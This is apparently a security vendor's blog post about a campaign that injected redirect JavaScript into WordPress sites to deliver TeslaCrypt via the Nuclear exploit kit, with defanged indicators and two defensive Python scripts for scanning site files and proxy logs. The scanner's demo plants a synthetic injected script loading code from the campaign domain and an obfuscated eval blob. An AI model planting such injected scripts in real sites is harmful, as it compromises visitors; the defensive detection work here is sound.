
Our team warns that a large number of websites running the WordPress platform have been compromised by cyber criminals.

Hundreds of WordPress websites spreading malware

The attackers injected obfuscated JavaScript code into these websites. Users who land on the hacked websites are redirected, via multiple intermediate servers, to a domain called “chrenovuihren”.

You can see a typical infection chain below:

[Compromised, legitimate website running WordPress] -> http://js[.]chrenovuihren[.]org/mobile/?id=[campaign ID]&keyword=[coded ID]

The malicious scripts injected into the WordPress websites funnel all of the traffic to the “chrenovuihren” domain, where visitors are served a page with the following HTML title:

<title>Advertised</title>

This fake advertisement page then forwards the traffic to the servers hosting the exploit kit, which tries to exploit vulnerabilities in software on the victim’s system.
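The first stage of this chain lives in the compromised site's own files, so the practical question for a site owner is where the injected code sits. The sweep below is an added example, not Heimdal's or Sucuri's tooling: it walks a WordPress document root and flags files that reference the campaign's gateway domain, .js files that end in a long obfuscated line appended after otherwise normal code, and PHP templates carrying an inline script with obfuscation markers. The heuristics, thresholds and the mini docroot it builds in a temporary directory are assumptions constructed for the demonstration; the appended payload strings are synthetic, not the campaign's real code.

```python
"""Sweep a WordPress docroot for the injected JavaScript this campaign relies on.

Added example, not Heimdal's or Sucuri's tooling. The heuristics are assumptions
drawn from the two observed behaviours: a redirect to *.chrenovuihren.* and
obfuscated code appended to the end of otherwise legitimate .js files.
"""
import os
import re
import tempfile
from dataclasses import dataclass

# The campaign's gateway domain, refanged from the sanitized form in the post.
CAMPAIGN_DOMAIN = re.compile(r"chrenovuihren\.(?:com|biz|net|org)", re.I)

# Markers common to obfuscated droppers. None is proof on its own; they are
# combined with position (appended at file end) and line length below.
OBFUSCATION_MARKERS = re.compile(
    r"eval\(|String\.fromCharCode|unescape\(|document\.write\(|(?:\\x[0-9a-f]{2}){8,}",
    re.I,
)
LONG_LINE = 400  # assumption: a tail line this long with markers is worth a look


@dataclass
class Finding:
    path: str
    reason: str


def suspicious_tail(text: str) -> bool:
    """True when the file ends with a long, marker-laden line that is not the
    whole file, i.e. something was appended to otherwise normal code."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    if len(lines) < 2:
        return False
    tail = lines[-1]
    return len(tail) >= LONG_LINE and bool(OBFUSCATION_MARKERS.search(tail))


def scan_file(path: str) -> list:
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    except OSError:
        return []
    out = []
    if CAMPAIGN_DOMAIN.search(text):
        out.append(Finding(path, "references campaign domain chrenovuihren"))
    if path.endswith(".js") and suspicious_tail(text):
        out.append(Finding(path, "obfuscated code appended to end of .js file"))
    if path.endswith(".php") and re.search(r"<script[^>]*>", text) and OBFUSCATION_MARKERS.search(text):
        out.append(Finding(path, "inline <script> with obfuscation markers in PHP template"))
    return out


def scan_tree(root: str) -> list:
    """Walk the docroot; triage hits by diffing against pristine wordpress.org copies."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith((".js", ".php", ".html")):
                findings.extend(scan_file(os.path.join(dirpath, name)))
    return sorted(findings, key=lambda f: f.path)


def build_sample_site(root: str) -> None:
    """Constructed mini docroot: one clean script, one with an appended
    obfuscated blob, and a theme footer with an inline redirect dropper."""
    os.makedirs(os.path.join(root, "wp-content", "themes", "demo"), exist_ok=True)
    os.makedirs(os.path.join(root, "wp-includes", "js"), exist_ok=True)
    clean = "(function($){ $(document).ready(function(){ $('.menu').show(); }); })(jQuery);\n"
    with open(os.path.join(root, "wp-content", "themes", "demo", "app.js"), "w", encoding="utf-8") as fh:
        fh.write(clean)
    appended = clean + "eval(String.fromCharCode(" + ",".join(["118"] * 200) + "));\n"
    with open(os.path.join(root, "wp-includes", "js", "jquery.js"), "w", encoding="utf-8") as fh:
        fh.write(appended)
    footer = (
        "<?php wp_footer(); ?>\n"
        "<script>document.write(unescape('%3Cscript src=\"http://js.chrenovuihren.org/mobile/?id=1\""
        "%3E%3C/script%3E'));</script>\n"
    )
    with open(os.path.join(root, "wp-content", "themes", "demo", "footer.php"), "w", encoding="utf-8") as fh:
        fh.write(footer)


def demo() -> list:
    """Build the constructed docroot in a temp dir and return the findings."""
    root = tempfile.mkdtemp(prefix="wp-scan-demo-")
    build_sample_site(root)
    return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f.path}: {f.reason}")
```

Point `scan_tree()` at a real docroot to use it; expect some noise from minified vendor libraries, which is why a hit should be confirmed by diffing the file against a pristine copy before anything is deleted.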

The attackers achieve this with the Nuclear exploit kit, which is sold commercially under the exploit-kit-as-a-service model.

Nuclear can exploit vulnerabilities in:

  • Adobe Flash Player
  • Adobe Reader / Acrobat
  • Internet Explorer
  • Silverlight

Hundreds of servers hosting WordPress-based websites have already been compromised.

Cyber criminal infrastructure details


We can also confirm that the following IP addresses are active Nuclear gateways (sanitized by Heimdal Security):

159.203.24[.]40
164.132.80[.]71
162.243.77[.]214

Cyber criminals know that moving fast is key to staying anonymous.

Note that the campaign uses several domains to deliver the malicious code, so the set of active servers changes quickly as the domains are repointed to different IP addresses in DNS. A small selection of the malicious domains involved in this campaign is reproduced below (sanitized by Heimdal Security):

[subdomain].chrenovuihren[.]com
[subdomain].chrenovuihren[.]biz
[subdomain].chrenovuihren[.]net
[subdomain].chrenovuihren[.]org
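Because the gateway hops between domains and IPs, the indicators above are most useful when run over proxy or DNS logs rather than checked by hand. The script below is an added example (not Heimdal's code) that refangs the sanitized IoCs, matches any subdomain of the four listed domains on a label boundary, matches the three gateway IPs, and runs that over a handful of constructed Squid-style access.log lines. The log format and the sample lines are assumptions made for the demonstration; only the domains and IPs come from the post.

```python
"""Match web-proxy log lines against the IoCs published for this campaign.

Added example: the Squid-style log lines are constructed, and the IoC list is
the post's sanitized entries refanged into the form that appears in logs.
"""
import ipaddress
from urllib.parse import urlsplit

# IoCs as published (defanged with [.]). Subdomains are wildcarded in the
# post, so only the registrable domain is listed.
RAW_DOMAINS = ["chrenovuihren[.]com", "chrenovuihren[.]biz",
               "chrenovuihren[.]net", "chrenovuihren[.]org"]
RAW_IPS = ["159.203.24[.]40", "164.132.80[.]71", "162.243.77[.]214"]


def refang(ioc: str) -> str:
    """Turn a sanitized indicator back into the form seen in logs."""
    return ioc.replace("[.]", ".").replace("hxxp", "http").lower()


IOC_DOMAINS = [refang(d) for d in RAW_DOMAINS]
IOC_IPS = {refang(i) for i in RAW_IPS}


def matched_domain(host: str):
    """Return the IoC domain covering host, honouring label boundaries so
    that notchrenovuihren.org does not match chrenovuihren.org."""
    host = host.lower().rstrip(".")
    for d in IOC_DOMAINS:
        if host == d or host.endswith("." + d):
            return d
    return None


def matched_ips(*candidates) -> list:
    """IoC IPs among the candidates (the URL host may itself be an IP literal)."""
    hits = []
    for c in dict.fromkeys(candidates):  # dedupe while keeping order
        try:
            ip = str(ipaddress.ip_address(c))
        except ValueError:
            continue
        if ip in IOC_IPS:
            hits.append(ip)
    return hits


def parse_squid(line: str):
    """Squid native access.log fields (assumed format):
    ts elapsed client action/code size method url user hierarchy/peer type."""
    f = line.split()
    if len(f) < 9:
        return None
    host = urlsplit(f[6]).hostname or ""
    peer = f[8].split("/", 1)[1] if "/" in f[8] else ""
    return {"client": f[2], "url": f[6], "host": host, "peer": peer}


def scan_log(lines) -> list:
    """Return one record per line that touched a campaign domain or gateway IP."""
    hits = []
    for line in lines:
        rec = parse_squid(line)
        if rec is None:
            continue
        reasons = []
        d = matched_domain(rec["host"])
        if d:
            reasons.append("domain:" + d)
        reasons += ["ip:" + ip for ip in matched_ips(rec["host"], rec["peer"])]
        if reasons:
            hits.append({**rec, "reasons": reasons})
    return hits


# Constructed sample: one gateway hit by domain and IP, one clean fetch, one
# direct-to-IP fetch, one look-alike domain that must NOT match, one subdomain hit.
SAMPLE_LOG = [
    "1454579923.117 312 10.0.0.12 TCP_MISS/200 5123 GET http://js.chrenovuihren.org/mobile/?id=42&keyword=abc - HIER_DIRECT/159.203.24.40 text/html",
    "1454579924.201 88 10.0.0.12 TCP_MISS/200 912 GET http://legit-blog.example/wp-includes/js/jquery.js - HIER_DIRECT/203.0.113.5 application/javascript",
    "1454579925.909 455 10.0.0.19 TCP_MISS/200 77123 GET http://164.132.80.71/gate/ - HIER_DIRECT/164.132.80.71 application/octet-stream",
    "1454579926.010 20 10.0.0.22 TCP_MISS/200 200 GET http://notchrenovuihren.org/ - HIER_DIRECT/198.51.100.9 text/html",
    "1454579927.333 140 10.0.0.31 TCP_MISS/200 640 GET http://cdn.chrenovuihren.biz/x.js - HIER_DIRECT/198.51.100.77 application/javascript",
]

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(h["client"], h["host"], ", ".join(h["reasons"]))
```

The look-alike line is there deliberately: a naive substring check on "chrenovuihren" would flag it, while the label-boundary test in `matched_domain()` does not. Feed `scan_log()` a real access.log (one line per element) to triage which internal clients reached the gateway and therefore need a ransomware check.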

If the victim’s computer is not fully patched, the exploit kit drops TeslaCrypt ransomware on it. Nothing in the delivery chain is specific to TeslaCrypt, so CryptoWall or another ransomware family could just as easily be delivered the same way.

[Image: TeslaCrypt payload]

We have already blocked more than 85 domains that are being actively used in this campaign, and the list will most likely increase.

As you can see, antivirus detection of the exploit code is low: only 2 of 66 engines on VirusTotal flagged it at the time of writing.

Meanwhile, the payload also achieves only limited detection.

[Image: VirusTotal detection rate for the payload, WordPress malware campaign, February 4 2016]

The full VirusTotal detection rate at the time the campaign was announced is linked from the original post.


Conclusion


These details make this a massive malware campaign, and the trend is likely to continue. Only 3 days ago, Sucuri Security also announced a huge campaign targeting WordPress websites in which cyber criminals “injected encrypted code at the end of all legitimate .js files”.

The same group of attackers may be behind both campaigns, but that is not confirmed.

With fileless malware infections and commercially available exploit kits, the cyber crime scene is getting more complicated by the day. This is why we urge website owners that use WordPress to secure their servers, and Internet users to follow these key recommendations to protect themselves against ransomware:

  • Keep software and your operating system updated at all times
  • Backup your data, do it often and in multiple locations
  • Use a security tool that filters your web traffic and can block the ransomware delivery that traditional antivirus does not detect.


Comments

Internet Explorer is safe, there is nothing wrong with it.

I got such a chrome warning on my site. How can I detect where the code was placed on my site so that I can remove it? Thanks!

Someone should take a look at your server and scan it with a dedicated security solution to see if it’s infected. Sucuri offers very good WordPress security solutions.
